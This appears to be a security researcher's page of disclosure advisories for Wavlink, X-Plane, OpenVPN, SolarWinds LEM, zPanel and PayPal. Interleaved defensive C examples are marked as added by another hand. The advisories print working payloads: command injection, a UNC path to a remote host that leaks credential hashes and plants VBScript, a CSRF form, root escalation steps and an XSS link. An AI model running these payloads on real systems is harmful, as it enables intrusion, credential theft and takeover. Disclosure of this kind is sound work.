2021/02/06

Wavlink Multiple AP Products: Unauthenticated Remote Root Command Execution


BACKGROUND

The WAVLINK brand is growing rapidly in the market for wireless networking equipment and IT peripherals.


DESCRIPTION

Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. User input is not properly sanitized, which allows command injection via the "key" parameter of a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected.


PROOF OF CONCEPT 

1. CVE-2020-13117 - Remote Root Command Execution via the "key" parameter

When a user logs in, the value of the "key" parameter is injected into a command execution without filtering, before the authentication check. The original advisory illustrates this with a screenshot of the vulnerable code (an "echo" command built from the raw parameter); the screenshot is not reproduced in this text version.

Due to the lack of sanitization, it is possible to break out of the "echo" command context and execute arbitrary commands as root. For example, the following payload would execute the "whoami" command:

';`whoami;`;#


It is important to note that the device registers itself on the network as "wifi.wavlink.com" to make setup easier, since the user does not have to look up the assigned IP address; this also allows the vulnerability to be triggered from a remote website without knowing the device IP.


There is a payload size limitation, but it can be bypassed by splitting the command across several requests to execute more complex commands.
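The defensive counterpart to the injection described above, written here as an added example and not taken from Wavlink firmware: the "key" value is checked against a character allowlist before anything else happens, the comparison with the stored secret is done in-process, and no part of the request ever reaches a shell. The names (handle_login, stored_key) and the assumption that the key is compared against a secret held on the device are mine, not the page's.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Wavlink code. Assumes the login "key" is compared
 * against a secret stored on the device (stored_key is hypothetical). */

#define KEY_MAX_LEN 64

typedef enum {
    LOGIN_OK = 0,
    LOGIN_BAD_FORMAT = 1,   /* rejected before any other processing */
    LOGIN_BAD_KEY = 2
} login_result;

/* Returns the offset of the first character outside the allowlist
 * [A-Za-z0-9], or -1 when every character is acceptable. The offset is
 * handy for logging what a client tried to send. */
int first_rejected_offset(const char *s)
{
    for (int i = 0; s[i] != '\0'; i++) {
        if (!isalnum((unsigned char)s[i]))
            return i;
    }
    return -1;
}

/* A key is well formed when it is non-empty, bounded in length and made
 * only of allowlisted characters. Metacharacters such as ' ; ` # are
 * rejected by construction rather than by a denylist. */
int key_is_well_formed(const char *key)
{
    size_t len = 0;
    while (key[len] != '\0') {
        if (++len > KEY_MAX_LEN)
            return 0;
    }
    if (len == 0)
        return 0;
    return first_rejected_offset(key) == -1;
}

/* Constant-time comparison over the overlapping length, so the check
 * does not leak how many leading characters matched. */
static int keys_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b);
    unsigned char diff = (unsigned char)(la != lb);
    for (size_t i = 0; i < la && i < lb; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Order matters: the format check runs before the secret is consulted,
 * so a malformed value is never handed to anything that interprets it. */
login_result handle_login(const char *submitted_key, const char *stored_key)
{
    if (!key_is_well_formed(submitted_key))
        return LOGIN_BAD_FORMAT;
    if (!keys_equal(submitted_key, stored_key))
        return LOGIN_BAD_KEY;
    return LOGIN_OK;
}

int main(void)
{
    /* The advisory's own payload is rejected at offset 0. */
    const char *payload = "';`whoami;`;#";
    printf("rejected at offset %d, result %d\n",
           first_rejected_offset(payload), handle_login(payload, "abc123"));
    return 0;
}
```

The allowlist is deliberately narrow; if a deployment needs a richer key alphabet, widen the allowlist rather than switching to a denylist of shell characters, because the set of characters a given shell treats specially is larger than most denylists assume.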


The following file contains a PoC exploit that downloads and executes a file when a malicious website is visited:

https://drive.google.com/file/d/1k5Q_0cW5WOR4AY1IrkztD8COAwPpEu9O/view?usp=sharing


TIMELINE

April 15, 2020: Contact with Wavlink 
February 6, 2021: After several unsuccessful attempts to contact them, advisory published.


DISCOVERED BY

Jose Antonio Pérez Piedra

2020/03/28

X-Plane < 11.41 Remote Command Execution

BACKGROUND
X-Plane is a flight simulator produced by Laminar Research. X-Plane can be used professionally with the appropriate license, or for personal use.

DESCRIPTION
X-Plane <= 11.40 is affected by two vulnerabilities that may allow remote users to execute arbitrary commands on systems running the simulator. Some networking interface commands, needed to interact with third-party apps, are not properly sanitized, which allows memory corruption and path traversal/arbitrary file write. The affected interface is enabled by default and listens on UDP port 49000. The protocol documentation is public. These vulnerabilities could be chained to execute arbitrary system commands.

PROOF OF CONCEPT

1. CVE-2019-19605 - Arbitrary memory write via crafted network packets, which could cause a denial of service or arbitrary code execution.

  • Command affected: ACFN
  • Parameter affected: acfn_p

- The affected parameter is used as an array index without range checks, allowing a controlled out-of-bounds memory write.



2. CVE-2019-19606 - Multiple improper path validations, which could allow reading and writing files from/to arbitrary paths (or leaking OS credentials to a remote system).

  • Command affected: SIMO
  • Parameter affected: Second parameter (SIMO_path)

  • Command affected: ACFN
  • Parameter affected: Second parameter (acfn_path_rel)

  • Command affected: OBJN
  • Parameter affected: Second parameter (path)

  - Allows arbitrary file read/write outside of the X-Plane installation folder. Several commands do not correctly filter their input.

  - It is also important to note that on Windows machines, when opening a file whose name starts with "\\" or "//" followed by an IP address or hostname, most I/O APIs will by default try to connect to it as an SMB shared folder (port 445), leaking the user's domain/group, username and password hash to the malicious server. If that port is closed and the WebClient service is running, they will try to reach the file via WebDAV (port 80).

  Other commands and parameters may be affected in the same way.

  The "ACFN" and "SIMO" commands can be used to leak the hashed credentials and execute arbitrary commands/code on every system reboot.
  • Load an aircraft from a shared folder with arbitrary VBScript code in the path, via the "ACFN" command. For example:
\\\\192.168.1.101/TMP/<script language="VBScript">CreateObject("Wscript.Shell").Run "calc.exe"</script>/final.acf
  • Write a situation file with the "SIMO" command to the user's startup folder with an ".hta" extension, gaining execution of the VBScript code stored as the aircraft path inside the file. For example:
test.txt/../../../../../../../../../../../../Users/<LEAKED_USER>/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/test.hta
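The two checks the advisory's solution calls for, range checking of the index and path confinement, as an added example (not X-Plane code; the function names, the slot count and the sample paths are assumptions made for illustration). The path check is purely lexical so it works before any file exists, and it refuses the two shapes that matter on Windows: UNC prefixes ("\\" or "//"), which trigger SMB or WebDAV connections, and ".." components that climb out of the installation folder.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not X-Plane code. ACF_SLOTS is an assumed slot count. */

#define ACF_SLOTS 20
#define PATH_LIMIT 1024

/* Range check for an index received from the network. Returns the index
 * as a validated slot number, or -1 when it would address memory outside
 * the slot array (negative values and values >= nslots alike). */
long acfn_slot(long idx, size_t nslots)
{
    if (idx < 0 || (unsigned long)idx >= nslots)
        return -1;
    return idx;
}

/* Lexical confinement check for a path received from the network. The
 * path must stay relative to the installation folder:
 *   - no leading '/' or '\' (this also rejects "//host" and "\\host"
 *     UNC forms, which on Windows trigger SMB or WebDAV connections)
 *   - no drive letter such as "C:"
 *   - no ".." component, with either separator
 *   - no characters that are invalid in Windows file names, including
 *     '<' and '>' (a genuine aircraft path never contains markup) */
bool path_is_confined(const char *rel)
{
    size_t len = strlen(rel);
    if (len == 0 || len >= PATH_LIMIT)
        return false;
    if (rel[0] == '/' || rel[0] == '\\')
        return false;
    if (isalpha((unsigned char)rel[0]) && rel[1] == ':')
        return false;

    const char *p = rel;
    while (*p != '\0') {
        const char *start = p;
        while (*p != '\0' && *p != '/' && *p != '\\') {
            unsigned char c = (unsigned char)*p;
            if (c < 0x20 || c == 0x7f || strchr("<>:\"|?*", c) != NULL)
                return false;
            p++;
        }
        if ((size_t)(p - start) == 2 && start[0] == '.' && start[1] == '.')
            return false;
        if (*p != '\0')
            p++;
    }
    return true;
}

/* Combined admission check for an ACFN-style request: both the index and
 * the path must pass before anything is loaded. */
bool acfn_request_ok(long idx, const char *rel_path)
{
    return acfn_slot(idx, ACF_SLOTS) >= 0 && path_is_confined(rel_path);
}

int main(void)
{
    /* Constructed samples: a benign relative path and the two shapes
     * used in the advisory (UNC share, traversal into the startup folder). */
    printf("%d %d %d\n",
           acfn_request_ok(3, "Aircraft/Example/Example.acf"),
           acfn_request_ok(3, "\\\\192.168.1.101/TMP/final.acf"),
           acfn_request_ok(3, "test.txt/../../../../Users/someone/test.hta"));
    return 0;
}
```

A lexical check is the first gate, not the last: once the file is opened, the resolved absolute path should still be compared against the installation root, because case folding, 8.3 short names and symbolic links can all make two different strings name the same file.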


VIDEO
The following video shows a Kali virtual machine exploiting these vulnerabilities to execute commands (launching a calculator) on a machine running Windows 10 and X-Plane 11.40.



SOLUTION
Improve parameter filtering and add range checks on command parameters.


TIMELINE
November 5, 2019: Contact with X-Plane Team
November 5, 2019: X-Plane confirms the vulnerabilities.
December 6, 2019: X-Plane releases patched version 11.41r1
March 28, 2020: Advisory published.

DISCOVERED BY
Jose Antonio Pérez Piedra

2018/03/16

OpenVPN: Remote Information Disclosure and Denial Of Service (CVE-2018-7544)

BACKGROUND
OpenVPN is an open-source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities. It uses a custom security protocol that relies on SSL/TLS for key exchange. It is capable of traversing network address translators (NATs) and firewalls.

DESCRIPTION
A cross-protocol issue was discovered in the management interface of OpenVPN through 2.4.4.
Remote attackers can interact with the OpenVPN service by triggering actions in a web browser that execute management commands, which could be used, for example, to leak sensitive information or silently crash the service.

PROOF OF CONCEPT
The management interface tries to execute every line it receives as a command, so a multipart/form-data POST can be used to deliver a clean line containing controlled input, which the management interface then executes as a command. I used the "signal SIGTERM" command to force termination of the client, disconnecting the VPN without notifying the user, but any other command can be used. It is also possible to leak sensitive information such as the network interface configuration.

Here is the trivial PoC:
<html>
<body>
<form action="http://localhost:23000" method="post" enctype="multipart/form-data">
<textarea name="poc"> signal SIGTERM</textarea>
<input type="submit" value="Send">
</form>
</body>
</html>

The port can be brute-forced (for example via multiple XMLHttpRequest calls).
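Why the PoC works is that a browser can only ever speak HTTP, so the first line a browser-originated connection delivers is always an HTTP request line, not a management command. The guard below, an added example and not OpenVPN's code, uses exactly that: a fresh management connection whose first line has the shape "METHOD target HTTP/x.y" is closed before any later line (such as the " signal SIGTERM" in the form body) can be parsed. It also encodes the start-up policy the advisory proposes; the --management_insecure flag is the advisory's suggestion, not an existing OpenVPN option.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Added example, not OpenVPN management-interface code. */

/* True when the line has the shape of an HTTP request line:
 *   METHOD SP request-target SP HTTP/<digit>.<digit>
 * A browser cannot open a connection without sending one of these first,
 * so a management connection that starts this way is not a management
 * client and must be dropped whole. */
bool looks_like_http_request_line(const char *line)
{
    const char *p = line;
    size_t method_len = 0;
    while (*p >= 'A' && *p <= 'Z') {   /* GET, POST, OPTIONS, CONNECT ... */
        p++;
        method_len++;
    }
    if (method_len < 3 || method_len > 10 || *p != ' ')
        return false;
    p++;
    if (*p == ' ' || *p == '\0')      /* empty request-target */
        return false;
    while (*p != '\0' && *p != ' ')
        p++;
    if (*p != ' ')
        return false;
    p++;
    if (strncmp(p, "HTTP/", 5) != 0)
        return false;
    p += 5;
    return isdigit((unsigned char)p[0]) && p[1] == '.' &&
           isdigit((unsigned char)p[2]) &&
           (p[3] == '\0' || p[3] == '\r' || p[3] == '\n');
}

typedef enum {
    MGMT_ACCEPT = 0,
    MGMT_DROP_CROSS_PROTOCOL = 1   /* first line was HTTP: close the socket */
} mgmt_verdict;

/* Decision taken on the very first line of a new management connection,
 * before anything on it is interpreted as a command. */
mgmt_verdict first_line_verdict(const char *first_line)
{
    return looks_like_http_request_line(first_line) ? MGMT_DROP_CROSS_PROTOCOL
                                                     : MGMT_ACCEPT;
}

/* Start-up policy mirroring the advisory's proposed fix: a TCP management
 * listener without a password is refused unless the operator explicitly
 * opted in (the advisory's hypothetical --management_insecure). A unix
 * socket is always allowed because file permissions gate access to it. */
bool management_listener_allowed(bool is_tcp, bool has_password,
                                 bool insecure_opt_in)
{
    if (!is_tcp)
        return true;
    return has_password || insecure_opt_in;
}

int main(void)
{
    /* Constructed first lines: what a browser sends, and what a real
     * management client sends. */
    printf("browser: %d, client: %d\n",
           first_line_verdict("POST / HTTP/1.1"),
           first_line_verdict("status"));
    return 0;
}
```

The request-line check is the detection the advisory's "cross-protocol" label points at: it is cheap, it needs no knowledge of the form encoding, and it does not depend on the port being secret, which the brute-forcing note shows it is not.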

LIMITATIONS
Only one client can be connected to the management interface at the same time.

SOLUTION
Require the user to set a password, or to pass an explicit parameter (--management_insecure), when the interface is configured to use TCP without a password.

VENDOR RESPONSE
Won't fix. They added some information to the man page recommending Unix sockets instead of TCP.

DISCOVERED BY
Jose Antonio Pérez Piedra

2017/03/23

SolarWinds LEM: SSH Jailbreak and Privilege Escalation

BACKGROUND
SolarWinds LEM (or SIEM) is a log management software for security, compliance, and troubleshooting. Log & Event Manager includes rules and reports for standards like HIPAA, PCI-DSS, SOX, GLBA, NCUA, NERC-CIP, DISA-STIG, and more.

DESCRIPTION
SolarWinds LEM <= 6.3 is affected by two vulnerabilities that allow remote authenticated users to escape from the sandbox and elevate privileges to root. The vulnerable interface exposes some internal tools that can be used to escape from the jail and execute arbitrary commands on the system. A second flaw related to improper permissions allows users to execute commands as root.

PROOF OF CONCEPT
The affected resource is the custom SSH interface. It is a limited shell which only allows specific management actions, such as modifying network interfaces or viewing the server status. Due to weak isolation, it is possible to escape from this interface and launch an unrestricted system shell.

1. CVE-2017-5199 - SolarWinds SIEM authenticated custom shell Jailbreak and command execution

- Log in through SSH (port 32022 by default).
- Access the "appliance" section.
- Enter the "editbanner" command. A "nano" editor will be shown.
- Press the "F5" key and then <CTRL+T>. This combination opens a file explorer.
- Navigate to "/usr/local/contego/scripts/" and open "mgrconfig.pl". This is the logon shell script and it is writable, but it cannot be saved to the right file yet.
- Press <ALT+F>, then <CTRL+R>. This enables multibuffer mode and asks for a file to insert. Enter "/usr/local/contego/scripts/mgrconfig.pl".
- When loaded, search for "sub do_main" with <CTRL+W>.
- Insert the line 'system("/bin/bash");' just after 'print "cmc>";'.
- Finally, save the file with <CTRL+O> and ENTER.
- Exit SSH and log in again.
- Once logged in, a bash shell will be shown.



2. CVE-2017-5198 - SolarWinds SIEM incorrect permissions on management scripts allows privilege escalation 

- Once in the bash shell, check the available "sudo" commands: sudo -l
- Due to incorrect permissions, it is possible to edit the content of several scripts that are allowed to run under sudo.
- I chose "/usr/local/contego/scripts/hostname.sh". Open it with nano, delete the content and put just "/bin/bash -i". Save it with <CTRL+O>.
- Execute "sudo /usr/local/contego/scripts/hostname.sh" to get a root shell.
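The permission mistake behind CVE-2017-5198 is a sudo target that an unprivileged user can rewrite. The check below, an added example rather than anything from SolarWinds, is what an appliance build or audit job should run over every path listed in sudoers: the file must be a regular file (not a symlink), owned by root and not group- or world-writable, and so must every directory above it, because a writable parent lets the file be replaced even when the file itself is locked down. The policy is split into a pure function of (owner, mode) so it can be tested without root.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Added example, not SolarWinds code. */

/* Policy for anything sudo is allowed to run for an unprivileged user,
 * and for every directory leading to it: owned by root and not writable
 * by group or others. Sticky world-writable directories such as /tmp are
 * still rejected: a sudo target has no business living there. */
bool sudo_target_mode_ok(uid_t owner, mode_t mode)
{
    if (owner != 0)
        return false;
    if (mode & (S_IWGRP | S_IWOTH))
        return false;
    return true;
}

/* Checks the target and every ancestor directory with lstat(). Symbolic
 * links are refused outright so a link cannot redirect the check.
 * Returns false on any stat failure or on a relative path. */
bool sudo_target_path_ok(const char *path)
{
    char buf[4096];
    size_t len = strlen(path);
    if (len == 0 || len >= sizeof buf || path[0] != '/')
        return false;
    memcpy(buf, path, len + 1);

    struct stat st;
    if (lstat(buf, &st) != 0 || !S_ISREG(st.st_mode))
        return false;
    if (!sudo_target_mode_ok(st.st_uid, st.st_mode & 07777))
        return false;

    /* Walk upwards, stripping one component per iteration, until only
     * the root directory "/" remains and has itself been checked. */
    for (;;) {
        char *slash = strrchr(buf, '/');
        if (slash == buf)
            buf[1] = '\0';
        else
            *slash = '\0';
        if (lstat(buf, &st) != 0 || !S_ISDIR(st.st_mode))
            return false;
        if (!sudo_target_mode_ok(st.st_uid, st.st_mode & 07777))
            return false;
        if (slash == buf)
            break;
    }
    return true;
}

int main(void)
{
    /* Placeholder path for illustration; substitute the sudoers entries
     * of the system under review. */
    const char *target = "/opt/example/scripts/hostname.sh";
    printf("%s: %s\n", target,
           sudo_target_path_ok(target) ? "ok" : "NOT safe for sudo");
    return 0;
}
```

Note that the advisory's fix in 6.3.1 addressed the file modes; this check would have flagged the original state, and it also catches the quieter variant where the script is fine but its parent directory is writable.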


BUSINESS IMPACT
An attacker can execute arbitrary commands as root, which leads to total machine compromise.


LIMITATIONS
The last published version (6.3.1) is still affected by the sandbox escape vulnerability, but the privilege escalation was patched by setting correct permissions on the affected files. However, it was verified that it is still possible to escalate privileges due to an outdated system kernel.

SOLUTION
Improve the isolation on the custom SSH interface and set correct permissions on all sensitive files to prevent unwanted access or modification.
It is also recommended to upgrade the system kernel to prevent privilege escalation issues. The SolarWinds team has confirmed that they are working on it.


TIMELINE
January 6, 2017: CVE assigned CVE-2017-5198 and CVE-2017-5199
January 6, 2017: Contact with SolarWinds Team
January 10, 2017: SolarWinds confirms the vulnerability. They said they are working on a fix.
January 14, 2017: SolarWinds confirms the patch and public release date (February 15, 2017).
March 23, 2017: Advisory published.

DISCOVERED BY
Jose Antonio Pérez Piedra

2014/03/09

zPanel 10.1.x - Remote Root Vulnerability

zPanel is a hosting administration panel intended as the free alternative to cPanel; it is fairly complete and offers a simple, comprehensive interface.

The story of this exploit began with the well-known bug in the zsudo binary discovered in version 10.0.2 and published by Zenny on Full Disclosure: a privilege escalation vulnerability through command execution as the superuser.
As of today, the latest version of the system (10.1.0) remains vulnerable to the same flaw. The same binary also contains a buffer overflow bug, which plays a secondary role because the command execution flaw is easier to exploit, but it is no less important.

I reported the flaw to the zPanel bug tracker (bugs.zpanelcp.com) on 6/11/2013; almost three months later, on 30/1/2014, I received a reply.
Broadly, the developer led me to understand that, since customers are not given SSH access, the flaw could not be exploited. That already strikes me as a serious mistake: the security of a computer system cannot rest on trust, as will be demonstrated below.

On receiving that reply I started digging for something that would allow the zsudo binary to be executed; chaining several bugs and configuration errors resulted in an exploit that can be used to obtain root access to the system without being authenticated in the panel.

The first flaw lies in the pChart2 2.1.3 library bundled with the panel. It is a version for which a file disclosure flaw was recently published (http://www.exploit-db.com/exploits/31173/). The problem is in the example files shipped with that library.
This gives access to the zPanel configuration file, which stores the MySQL root password. The directory holding the libraries should be closed to the public to prevent direct calls to them, which is not the case in zPanel.

Next, with the MySQL root password, we can log in via phpMyAdmin, located under the panel path http://localhost/etc/apps/phpmyadmin/, which does not restrict access either and can be reached by anyone without prior authentication.

Once inside, the path where the panel is installed can be found with a simple SQL query. By default, every file under this path has 777 permissions, which allows modifying any file in the folder or, more interesting for this exploit, creating new ones.

MySQL has statements to dump database information into files (INTO OUTFILE); this, together with the maximum privileges granted to the root user, opens the door to writing a PHP shell into the zPanel directory.

At this point the system is compromised, although we would only have the limited permissions of the www-data user. This is where the privilege escalation comes in, which would not be possible if the zsudo program were not vulnerable.

PHP security directives such as disable_functions could mitigate this attack by blocking potentially dangerous functions that allow command execution, such as passthru(), exec(), system(), popen(), etc., but zPanel allows their use.

To achieve the privilege escalation, zsudo can be abused. First the SSH service configuration file is modified to allow remote root login; once that is done, it is only necessary to change the root password and log in with it over SSH.
This is the route I followed to obtain superuser permissions, but there are many possible variants: a reverse connection as root, creating a superuser, etc.
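A hardened privileged helper of the kind the zsudo rewrite aims for, written here as an added example and not taken from zPanel or from the pull request mentioned in the timeline. It runs only targets on an exact-match allowlist (the /opt/example-panel paths are placeholders), measures every argument before touching it instead of copying it into a fixed buffer unchecked (the buffer overflow class of bug), refuses shell metacharacters as defense in depth because the allowed targets are shell scripts, and hands the result to execve() with a fixed environment, never to a shell.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Added example of a hardened setuid helper; not zPanel's code. */

#define ARG_MAX_LEN 128
#define ARGV_CAP 8

/* Scripts the helper may run, by exact absolute path (placeholders).
 * No other target is ever executed, so a caller cannot name /bin/sh or
 * smuggle a traversal path past the check. */
static const char *const ALLOWED_TARGETS[] = {
    "/opt/example-panel/bin/restart_web.sh",
    "/opt/example-panel/bin/reload_dns.sh",
};

/* Returns the allowlist index for `requested`, or -1. Exact comparison:
 * "/opt/example-panel/bin/../../../bin/sh" does not match anything. */
int resolve_target(const char *requested)
{
    size_t n = sizeof ALLOWED_TARGETS / sizeof ALLOWED_TARGETS[0];
    for (size_t i = 0; i < n; i++)
        if (strcmp(requested, ALLOWED_TARGETS[i]) == 0)
            return (int)i;
    return -1;
}

/* Bounded, conservative argument filter: length is checked while
 * scanning, never by copying, and characters a shell script might expand
 * or interpret are refused. */
bool arg_is_acceptable(const char *arg)
{
    size_t len = 0;
    for (; arg[len] != '\0'; len++) {
        unsigned char c = (unsigned char)arg[len];
        if (len >= ARG_MAX_LEN)
            return false;
        if (c < 0x20 || c == 0x7f || strchr("`$;|&<>()\\\"'", c) != NULL)
            return false;
    }
    return len > 0;
}

/* Assembles argv for execve(). Returns the argc produced, or -1 if the
 * target is not allowlisted, an argument is rejected, or argv would
 * exceed its fixed capacity (the NULL terminator is counted). */
int build_argv(const char *requested, int nargs, const char *const args[],
               const char *out_argv[], size_t out_cap)
{
    int idx = resolve_target(requested);
    if (idx < 0 || nargs < 0 || (size_t)nargs + 2 > out_cap)
        return -1;
    out_argv[0] = ALLOWED_TARGETS[idx];
    for (int i = 0; i < nargs; i++) {
        if (!arg_is_acceptable(args[i]))
            return -1;
        out_argv[i + 1] = args[i];
    }
    out_argv[nargs + 1] = NULL;
    return nargs + 1;
}

/* Convenience wrapper for one optional argument (NULL = none); returns
 * the argc build_argv would produce. */
int demo_argc(const char *requested, const char *arg)
{
    const char *argv[ARGV_CAP];
    const char *args[1] = { arg };
    return build_argv(requested, arg != NULL ? 1 : 0, args, argv, ARGV_CAP);
}

/* Executes with a fixed minimal environment and never via a shell.
 * Returns only on failure (execve does not return on success). */
int run_target(const char *requested, int nargs, const char *const args[])
{
    const char *argv[ARGV_CAP];
    static char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    if (build_argv(requested, nargs, args, argv, ARGV_CAP) < 0)
        return -1;
    return execve(argv[0], (char *const *)argv, envp);
}

int main(void)
{
    printf("allowlisted: %d, /bin/sh: %d, bad arg: %d\n",
           demo_argc("/opt/example-panel/bin/reload_dns.sh", "example.com"),
           demo_argc("/bin/sh", NULL),
           demo_argc("/opt/example-panel/bin/reload_dns.sh", "$(id)"));
    return 0;
}
```

The point the developer's reply missed is visible in the structure: the helper does not assume anything about who can reach it (no SSH access required or not), it assumes every input is hostile and still has nothing worth injecting into.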


In summary, it has been shown that no system can be trusted as infallible behind a single layer of security: sooner or later there will be a small breach which, combined with unpatched public flaws, can compromise the server completely.

Besides these flaws, I reported other minor bugs:
- XSS (https://github.com/zpanel/zpanelx/pull/106)
- XSS (https://github.com/zpanel/zpanelx/pull/104)
- Information disclosure (http://bugs.zpanelcp.com/view.php?id=704)



Below is the vulnerability tracking carried out by the zPanel team and the exploit that gives root access to the server.

Timeline:
- 06/11/2013: Command injection and buffer overflow in zsudo reported.
- 30/01/2014: Developer's reply: not considered exploitable and no patch will be released.
- 31/01/2014: Exploit reported.
- 01/02/2014: zsudo rewritten by me on GitHub (https://github.com/zpanel/zpanelx/pull/97).
- 01/03/2014: zPanel releases version 10.1.1.

UPDATE (27/10/2015):
Exploit published: http://pastebin.com/y5Pf4Yms


Vulnerability discovered by Jose Antonio Pérez
japp{at}0xlabs{dotz}com


2013/05/05

PayPal - Cross Site Scripting

One of the parameters of the link that PayPal provides for making payments is vulnerable to XSS (Cross Site Scripting), which could allow session theft from customers authenticated on PayPal.

If this kind of flaw is already serious for a company of this nature, where the bug is located greatly increases the chances of success of phishing attacks: an attacker could easily replace the login form included on this page with their own and obtain the customer's credentials, such as email and password, simply by modifying the payment button link provided by PayPal.

The only limitation of the bug is the maximum length of the string that can be injected, 23 characters; this can easily be evaded using URL shorteners, for example, as long as they work over SSL.

https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UPWVULJWYUVT6&on0=%3Ciframe%20src%3D%2f%2fnimb.cc%2f%3Easdasd&os0=1208171032&on1=asd&os1=NUEVA ALMACEN DE BARRIO CENTRICO EN BUENOS AIRES INTERESADA EN ABASTECIMIENTO DE PRODUCTOS KOSHER\"\'
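The mitigation for a reflected XSS like the one in the on0 parameter is contextual output encoding of every reflected value. The escaper below is an added example (not PayPal code) for the HTML text and double-quoted attribute contexts; it refuses an undersized buffer outright rather than emitting a truncated, possibly unbalanced entity, and the sample input is a constructed string in the shape of the injected iframe, not the page's payload.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not PayPal code. */

/* Escapes `s` for insertion into HTML text or a double-quoted attribute.
 * Writes at most `cap` bytes including the NUL; returns the number of
 * bytes written without the NUL, or -1 when `out` is too small (the
 * caller must then treat `out` as unusable). */
long html_escape(const char *s, char *out, size_t cap)
{
    size_t n = 0;
    if (cap == 0)
        return -1;
    for (; *s != '\0'; s++) {
        char single[2] = { *s, '\0' };
        const char *rep;
        switch (*s) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = single;   break;
        }
        size_t r = strlen(rep);
        if (n + r + 1 > cap)
            return -1;
        memcpy(out + n, rep, r);
        n += r;
    }
    out[n] = '\0';
    return (long)n;
}

/* True when escaping `in` yields exactly `expected`. */
int escapes_to(const char *in, const char *expected)
{
    char buf[256];
    long n = html_escape(in, buf, sizeof buf);
    return n >= 0 && strcmp(buf, expected) == 0;
}

/* True when html_escape refuses a destination of `cap` bytes. */
int escape_refuses(const char *in, size_t cap)
{
    char buf[256];
    if (cap > sizeof buf)
        return 0;
    return html_escape(in, buf, cap) < 0;
}

int main(void)
{
    /* Constructed sample in the shape of the injected on0 value. */
    char buf[128];
    if (html_escape("<iframe src=//example.com>", buf, sizeof buf) >= 0)
        printf("%s\n", buf);
    return 0;
}
```

Encoding alone closes the reflection; the 23-character limit mentioned above is not a defense, since the advisory already shows it is sidestepped with a shortened URL.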
